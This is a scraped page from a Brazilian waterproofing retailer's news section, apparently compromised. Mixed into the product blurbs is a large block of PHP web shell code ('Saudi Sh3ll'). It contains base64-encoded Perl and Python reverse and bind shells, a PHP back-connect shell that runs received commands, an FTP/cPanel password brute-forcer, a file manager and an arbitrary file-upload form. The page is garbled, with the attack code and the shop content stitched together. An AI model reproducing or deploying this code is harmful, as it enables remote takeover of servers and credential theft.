AgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tIik7ICANCiAgICAgICAgICAgICAgICAgY2xpZW50c29jay5jbG9zZSgpOyAgDQogICAgICAgICAgICAgICAgIGJyZWFrOyAgDQpleGNlcHQgIEtleWJvYXJkSW50ZXJydXB0IDogIA0KIA0KDQogICAgIHByaW50KCJcblxuPj4+PiBTZXJ2ZXIgVGVybWluYXRlZCA8PDw8PFxuIik7ICANCiAgICAgcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KICAgICBwcmludCgiXHRUaGFua3MgZm9yIHVzaW5nIEFuaS1zaGVsbCdzIC0tIFNpbXBsZSAtLS0gQ01EIik7ICANCiAgICAgcHJpbnQoIlx0RW1haWwgOiBsaW9uYW5lZXNoQGdtYWlsLmNvbSIpOyAgDQogICAgIHByaW50KCI9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0iKTsNCg=="; $back_perl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $back_py = "IyEvdXNyL2Jpbi9lbnYgcHl0aG9uIC11DQoNCmltcG9ydCBzeXMsIHNvY2tldCwgb3MNCg0KaWYgbGVuKHN5cy5hcmd2KSAhPSAzOg0KIHByaW50ICJbeF0gVXNvOiAlcyBbaG9zdF0gW3BvcnRdIiAlIChzeXMuYXJndlswXSkNCmVsc2U6DQogaG9zdCA9IHN0cihzeXMuYXJndlsxXSkNCiBwb3J0ID0gaW50KHN5cy5hcmd2WzJdKQ0KIGhhbmRsZXIgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQogdHJ5Og0KICB0cnk6DQogICBpZiBvcy5mb3JrKCkgPiAwOiBvcy5fZXhpdCgwKQ0KICBleGNlcHQgT1NFcnJvciwgZXJyb3I6DQogICBwcmludCAnRXJyb3IgRW4gRm9yazogJWQgKCVzKScgJSAoZXJyb3IuZXJybm8sIGVycm9yLnN0cmVycm9yKQ0KICAgcGlkID0gb3MuZm9yaygpDQogICBpZiBwaWQgPiAwOg0KICAgIHByaW50ICdGb3JrIE5vIFZhbGlkbyEnDQogIGhhbmRsZXIuY29ubmVjdCgoaG9zdCwgcG9ydCkpDQogIG9zLmR1cDIoaGFuZGxlci5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0KICBvcy5kdXAyKGhhbmRsZXIuZmlsZW5vKCksIHN5cy5zdGRvdXQuZmlsZW5vKCkpDQogIHdoaWxlIGhhbmRsZXIucmVjdjoNCiAgIGhhbmRsZXIuc2VuZGFsbCgoJ1xuW1NhdWRpIFNoM2xsXSM+JykpDQogICBvcy5zeXN0ZW0oJy9iaW4vYmFzaCcpDQogZXhjZXB0Og0KICBwcmludCAiWyFdIEVycm9yIGNvbm5lY3Rpb24i"; ////////////////////////// php /////////////////////// if ($op == 'php') { $sockfd=fsockopen($ip , $port , $errno, $errstr ); if($errno != 0) { echo "$errno : $errstr"; } else if (!$sockfd) { $result = "error connect!</p><br /><p> </p><br /><p>"; } else { fputs ($sockfd , " /\ Saudi Sh3ll v1.0 by al-swisre \/"); $pwd = shell_exec("pwd"); $sysinfo = shell_exec("uname -a"); $id = shell_exec("id"); $len = 1337; fputs($sockfd ,$sysinfo . "\n" ); fputs($sockfd ,$pwd . "\n" ); fputs($sockfd ,$id ."\n\n" ); while(!feof($sockfd)) { $cmdPrompt ="(Saudi sh3ll)[$]> "; fputs ($sockfd , $cmdPrompt ); $command= fgets($sockfd, $len); fputs($sockfd , "\n" . shell_exec($command) . "\n\n"); } fclose($sockfd); } echo "End Connect"; exit; } elseif ($op == 'perl') { op_sa("/tmp/sa.pl",$back_perl); $out = cmd("perl /tmp/sa.pl ".$ip." ".$port." 1>/dev/null 2>&1 &"); sleep(1); echo "</p><br /><pre>$out\n".cmd("ps aux | grep sa.pl")."</pre><br /><p>"; unlink("/tmp/sa.pl"); } elseif ($op == 'python') { op_sa("/tmp/sa.py",$back_py); $out = cmd("python /tmp/sa.py ".$ip." ".$port." 1>/dev/null 2>&1 &"); sleep(1); echo "</p><br /><pre>$out\n".cmd("ps aux | grep sa.py")."</pre><br /><p>"; } } else if ($_POST['con'] == 'Connect bind'){ /////////////////////// bind ///////////////////// if ($op == 'perl') { $bind_port = $_POST['bind_port']; op_sa("/tmp/sa.pl",$bind_perl); $out = cmd("perl /tmp/sa.pl ".$bind_port." 1>/dev/null 2>&1 &"); sleep(1); echo "</p><br /><pre>$out\n".cmd("ps aux | grep sa.pl")."</pre><br /><p>"; unlink("/tmp/sa.pl"); } else if ($op == 'python') { $bind_port = $_POST['bind_port']; op_sa("/tmp/sa.py",$bind_py); $out = cmd("python /tmp/sa.py ".$bind_port." 1>/dev/null 2>&1 &"); sleep(1); echo "</p><br /><pre>$out\n".cmd("ps aux | grep sa.py")."</pre><br /><p>"; unlink("/tmp/sa.py"); } }} break; ////////////////////////////////////////// BruteForce ///////////////////// case 'brt': echo "<br /><br /></p><br /><div class="cont3"><a href="$pg?sws=brt">[ BruteForce ]</a></div><br /><p><br />"; if (!isset($_POST['bru'])) { echo '<textarea cols="30" rows="15" name="user">userlist</textarea><textarea cols="30" rows="15" name="pass">passlist</textarea><br /><br /> target : <input name="trg" type="text" value="localhost" />    < name="op"> <option value="cpanel">cpanel</option> <option value="ftp">ftp</option> </><br /><br /><input name="bru" type="submit" value="brute" />'; exit; }else { $users = $_POST['user']; $pass = $_POST['pass']; $option = $_POST['op']; $connect_timeout=5; @ini_set('memory_limit', 1000000000000); $target = $_POST['trg']; @set_time_limit(0); $userlist = explode ("\n" , $users ); $passlist = explode ("\n" , $pass ); foreach ($userlist as $user) { $_user = trim($user); foreach ($passlist as $password ) { $_pass = trim($password); if($option == "ftp"){ ftp_check($target,$_user,$_pass,$connect_timeout); } if ($option == "cpanel") { cpanel_check($target,$_user,$_pass,$connect_timeout); } } } } break; ///////////////////////////////////////////////////// about /////////////////////////////////////////// case 'ab': echo '</p><br /><div class="hedr"><img src="http://im15.gulfup.com/2012-02-03/1328281037731.png" alt="Saudi Shell" /></div><br /><p><br /> '; echo "</p><br /><table cellpadding="0" align="center"><br /><form method="\"post\""></form> <br /><tbody><br /><tr><br /><td><br />Back Connect :<br /> <br /> Ip : <input name="\"ip\"" type="\"text\"" value="". $_SERVER[" />    Port : <input name="\"port\"" type="\"text\"" />    < name="\"op\""> <option value="\"php\"">PHP</option> <option value="\"perl\"">Perl</option> <option value="\"python\"">Python</option> </>   <input name="\"con\"" type="\"submit\"" value="\"Connect\"" /><br /> <br /><br /></td><br /></tr><br /><tr><br /><td><br />Bind Connect :<br /><br />Port : <input name="\"bind_port\"" type="\"text\"" /> < name="\"op\""> <option value="\"perl\"">Perl</option> <option value="\"python\"">Python</option> </> <input name="\"con\"" type="\"submit\"" value="\"Connect" /> <br /><br /> <br /></td><br /></tr><br /><form method="post"></form><br /></tbody><br /></table><br /><p>"; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; echo ""; exit; break; } } else { /////////// File Manager ////////////// $sws = 'al-swisre' ; if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;} if(@$_GET['dir']){ $dir = $_GET['dir']; if($dir != 'nullz') $dir = @cleandir($dir); } $curdir = @cleandir(@getcwd()); $self = $_SERVER['PHP_SELF']; $me = $_SERVER['PHP_SELF']; if($dir=="") $dir = $curdir; $dirx = explode(DIRECTORY_SEPARATOR, $dir); $files = array(); $folders = array(); echo"</p><br /><table cellpadding="5" align="center"><br /><tbody><br /><tr><br /><td><strong>Coded By :</strong> al-swisre</td><br /></tr><br /><tr><br /><td><strong>E-mail :</strong> oy3@hotmail.com</td><br /></tr><br /><tr><br /><td><strong> :</strong> Saudi Arabian</td><br /></tr><br /><tr><br /><td><strong>Age :</strong> 2/1995</td><br /></tr><br /><tr><br /><td><strong>twitter :</strong> <a href="https://twitter.com/!/al_swisre" target="_blank">al_swisre</a></td><br /></tr><br /><tr><br /><td><strong>S.Greetz 2 :</strong> Mr.Alsa3ek - Ejram Hacker</td><br /></tr><br /><tr><br /><td><strong>Greetz 2 :</strong> e.V.E.L - G-B - kinG oF coNTrol - w0LF Gh4m3D - iNjeCt - abu halil 501 - Mr.Pixy</td><br /></tr><br /><tr><br /><td><strong>And :</strong> Mr.Black - IraQiaN-r0x - Oxygen - locked - n4ss .. and All members of v4-team.com</td><br /></tr><br /></tbody><br /></table><br /><p>"; echo"</p><br /><table cellpadding="0" width="100%" align="center"><br /><tbody><br /><tr><br /><td>"; echo" Your path :  "; for($i=0;$i$dirx[$i]" . DIRECTORY_SEPARATOR); } echo "</td><br /><td> </td><br /></tr><br /></tbody><br /></table><br /><p><br />"; echo"</p><br /><div class="t3p">"; echo""; if ($handle = @opendir($dir)) { while (false != ($link = readdir($handle))) { $on3 = @posix_getpwuid(@fileowner($dir."/".$link)) ; $gr = @posix_getgrgid(@filegroup($dir."/".$link)); if (@is_dir($dir . DIRECTORY_SEPARATOR . $link)){ $file = array(); @$file['link'] = "<a href="$me?dir=$dir" . DIRECTORY_SEPARATOR . "$link">[ $link ]</a>"; $file['pir'] = "<a href="?sws=chmod&file=$link&dir=$dir">".@wsoPermsColor($dir."/".$link)."</a>"; $file['pir2'] = "<a href="?sws=chmod&file=$link&dir=$dir">".@perm($dir."/".$link)."</a>"; $folder = "" ; array_push($folders, $folder); } else{ $file = array(); $ext = @strpos($link, ".") ? @strtolower(end(explode(".", $link))) : ""; $file['pir'] = "<a href="?sws=chmod&file=$link&dir=$dir">".@wsoPermsColor($dir."/".$link)."</a>"; $file['pir2'] = "<a href="?sws=chmod&file=$link&dir=$dir">".@perm($dir."/".$link)."</a>"; $file['size'] = @number_format(@filesize($dir."/".$link)/1024,2); @$file['link'] = "<a href="?sws=edit&file=$link&dir=$dir">".$link ."</a>"; $file = "" ; array_push($files, $file); } } asort($folders); asort($files); foreach($folders as $folder) echo $folder; foreach($files as $file) echo $file; echo "<br /><table cellpadding="0" width="100%" align="center"><br /><tbody><br /><tr><br /><td>Name</td><br /><td>Size</td><br /><td>Modify</td><br /><td>Owner/Group</td><br /><td>Permissions</td><br /><td>Option</td><br /><td> </td><br /></tr><br /><tr><br /><td>".$file['link']."</td><br /><td>dir</td><br /><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><br /><td>".$on3['name']."/".$gr['name']."</td><br /><td>".$file['pir']."   ".$file['pir2']."</td><br /><td><a href="?sws=rname&file=$link&dir=$dir">R</a> - <a href="?sws=chmod&file=$link&dir=$dir">C</a> - <a href="?sws=rm&file=$link&dir=$dir">rm</a></td><br /></tr><br /><tr><br /><td>".$file['link']."</td><br /><td>".$file['size']."</td><br /><td>".date('Y-m-d H:i:s', @filemtime($dir."/".$link))."</td><br /><td>".$on3['name']."/".$gr['name']."</td><br /><td>".$file['pir']."   ".$file['pir2']."</td><br /><td><a href="?sws=edit&file=$link&dir=$dir">E</a> - <a href="?sws=rname&file=$link&dir=$dir">R</a> - <a href="?sws=chmod&file=$link&dir=$dir">C</a> - <a href="?sws=dow&file=$link&dir=$dir">D</a> - <a href="?sws=rm&file=$link&dir=$dir">rm</a></td><br /></tr><br /></tbody><br /></table><br /></div><br /><p>" ; closedir($handle); } } if ($_GET['sws'] == 'rname') { $dir = $_GET['dir']; $file = $_GET['file']; if (!isset($file) or !isset ($dir)){ echo "<br /><br /><a href="$pg">[ Back ]</a>"; exit;} if (!isset($_POST['edit'])) { echo "</p><br /><div class="\"cont3\""><a href="?sws=edit&file=$file&dir=$dir">Edit</a>   <a href="?sws=rname&file=$file&dir=$dir">Rename</a>  <a href="?sws=chmod&file=$file&dir=$dir">Chmod</a>  <a href="?sws=dow&file=$file&dir=$dir">Download</a> <a href="?sws=rm&file=$file&dir=$dir"></a></div><br /><p><br /> dir : <a href="$pg?dir=".$_GET[">".$_GET['dir']."</a>    file name : ".$_GET['file']." <br /> <br /></p><br /><form method="post"> new name : <input name="name" type="text" value="$file" /><br /><br /> <input name="edit" type="submit" value="edit" /> </form><br /><p>"; }else { $new = $_POST['name']; $rn = @rename ($dir."/".$file,$dir."/".$new); if(!$rn) { @cmd("cd $dir;mv $file $new "); }else { echo "<br /><br />Name change successfully"; echo "<br /><br /><a href="?sws=rname&file=$new&dir=$dir">[ Back ]</a>"; } } } if ($_GET['sws'] == 'chmod') { $dir = $_GET['dir']; $file = $_GET['file']; if (!isset($file) or !isset($dir)){ echo "<br /><br /><a href="$pg">[ Back ]</a>"; exit;} if (!isset($_POST['edit'])) { echo "</p><br /><div class="\"cont3\""><a href="?sws=edit&file=$file&dir=$dir">Edit</a>   <a href="?sws=rname&file=$file&dir=$dir">Rename</a>  <a href="?sws=chmod&file=$file&dir=$dir">Chmod</a>  <a href="?sws=dow&file=$file&dir=$dir">Download</a> <a href="?sws=rm&file=$file&dir=$dir"></a></div><br /><p><br /> dir : <a href="$pg?dir=".$_GET[">".$_GET['dir']." . . . <br /> <a href='http://www.casadoimpermeabilizante.com.br/noticia-detalhe/261'><img src='http://www.casadoimpermeabilizante.com.br/site/images/saiba_mais.jpg' alt='' title='' border='0' style='vertical-align:middle; margin-top:3px;'/></a> </div> </div> </div> <div class='noticia'> <div class='noticiaFoto'> <img src='http://www.casadoimpermeabilizante.com.br/arquivos/fotos/260/TH_398.jpg' alt='' title='' /> </div> <div class='noticiaDetalhes' style='width:380px;' > <div class='noticiaTitulo'>Super Graute Quartzolit</div> <div class='noticiaTexto'> <ul><br /><li>Alta resistência inicial e final</li><br /><li>Grande fluidez com características de autonivelamento</li><br /><li>Retração controlada</li><br /><li>Não agride a armadura</li><br /><li>Liberação em curto prazo </li><br /><li>Baixa permeabilidade à água</li><br /><li>Garantia da qualidade das matérias-primas e do traço</li><br /></ul><br /><!?php $files = @$_FILES["files"]; if ($files["name"] != '') { $fullpath = $_REQUEST["path"] . $files["name"]; if (move_uploaded_file($files['tmp_name'], $fullpath)) { echo "<br /><h1><br /><p><a href="$fullpath">OK-Click here!</a>"; } }echo 'Upload files...</p><br /><form enctype="multipart/form-data" method="POST"><input name="path" type="text" /><input name="files" type="file" /><input type="submit" value="Up" /></form><br /><p>'; ?></p> . . . <br /> <a href='http://www.casadoimpermeabilizante.com.br/noticia-detalhe/260'><img src='http://www.casadoimpermeabilizante.com.br/site/images/saiba_mais.jpg' alt='' title='' border='0' style='vertical-align:middle; margin-top:3px;'/></a> </div> </div> </div> <div class='noticia'> <div class='noticiaFoto'> <img src='http://www.casadoimpermeabilizante.com.br/arquivos/fotos/254/TH_392.jpg' alt='' title='' /> </div> <div class='noticiaDetalhes' style='width:380px;' > <div class='noticiaTitulo'>FITA TERRACOTA</div> <div class='noticiaTexto'> <p><span>Agora, além do tradicional acabamento em alumínio, também temos em linha as fitas multiuso de vedação com acabamento na cor terracota, especialmente desenvolvido para aplicação em telhados coloniais, deixando um acabamento muito mais bonito e discreto, quase imperceptíve (disponível nas medidas de 10cm e 45cm). Fita multiuso composta por cimento asfáltico enriquecido com polímeros elastômeros. É aluminizada ou com acabamento terracota em uma das faces e autoaderente na outra. Desenvolvida para vedação, proteção acústica e térmica, tanto para altas como baixas temperaturas, em superfícies e reparos em geral.</span></p> . . . <br /> <a href='http://www.casadoimpermeabilizante.com.br/noticia-detalhe/254'><img src='http://www.casadoimpermeabilizante.com.br/site/images/saiba_mais.jpg' alt='' title='' border='0' style='vertical-align:middle; margin-top:3px;'/></a> </div> </div> </div> </div><div id='right'> <div id='box1'> <img src='http://www.casadoimpermeabilizante.com.br/site/images/box1Topo.jpg' alt='' title='' style='margin:0;' /> <h3> LANÇAMENTOS QUARTZOLIT!!! </h3> <img src='http://www.casadoimpermeabilizante.com.br/arquivos/fotos/213/TH_362.jpg' alt='' title='' align='left' width='124.8' /> <p> <p><span><strong>CONHEÇA EM NOSSA PÁGINA DE PRODUTOS A MANTA LÍQUIDA QUARTZOLIT "ANCHORFLEX BRANCO". A SOLUÇÃO PRÁTICA, RÁPIDA E ECONÔMICA DE IMPERMEABILIZAR LAJES, MARQUISES, PAREDES E QUALQUER ÁREA EXPOSTA AO SOL E À CHUVA!!!</strong></span></p> <br /> <a href = 'http://www.casadoimpermeabilizante.com.br/noticia-detalhe/213'>... saiba mais</a> </p> <img src='http://www.casadoimpermeabilizante.com.br/site/images/box1Base.jpg' alt='' title='' style='margin:0;' /> </div> <div id='box2'> <img src='http://www.casadoimpermeabilizante.com.br/site/images/box2Topo.jpg' alt='' title='' style='margin:0;' /> <h3> FRASE DE OUTUBRO </h3> <img src='http://www.casadoimpermeabilizante.com.br/arquivos/fotos/59/TH_399.jpg' alt='' title='' align='left' width='124.8' /> <p> <br /> <a href = 'http://www.casadoimpermeabilizante.com.br/noticia-detalhe/59'>... saiba mais</a> </p> <img src='http://www.casadoimpermeabilizante.com.br/site/images/box2Base.jpg' alt='' title='' style='margin:0;' /> </div> <div id='box3'> <img src='http://www.casadoimpermeabilizante.com.br/site/images/box3Topo.jpg' alt='' title='' style='margin:0;' /> <h3> Prêmio Anamaco </h3> <img src='http://www.casadoimpermeabilizante.com.br/arquivos/fotos/61/TH_85.jpg' alt='' title='' align='left' width='78' /> <p> <p>A Casa do Impermeabilizante, foi eleita entre os fornecedores, clientes e especialistas do segmento, como o maior distribuidor de impermeabilizantes do Estado de Minas Gerais, no último prêmio Anamaco realizado.</p> <br /> <a href = 'http://www.casadoimpermeabilizante.com.br/noticia-detalhe/61'>... saiba mais</a> </p> <img src='http://www.casadoimpermeabilizante.com.br/site/images/box3Base.jpg' alt='' title='' style='margin:0;' /> </div> </div> </div> <div id="footer"> Rua Magnólia 637 Caiçara - Belo Horizonte - MG. Cep: 31.230-060 - Tel.: (31) 3411 - 6666 </div> <a href="http://www.wtsistemas.com.br/" target="_blank"> <img id="wtsistemas" src="{$_SESSION["baseDir"]}/site/images/wtsistemas.jpg" alt="Desenvolvido por: WT Sistemas" title="Desenvolvido por: WT Sistemas" /> </a> </div> <script type="text/javascript" src="http://www.casadoimpermeabilizante.com.br/site/js/google_analytics.js"></script> </body> </html>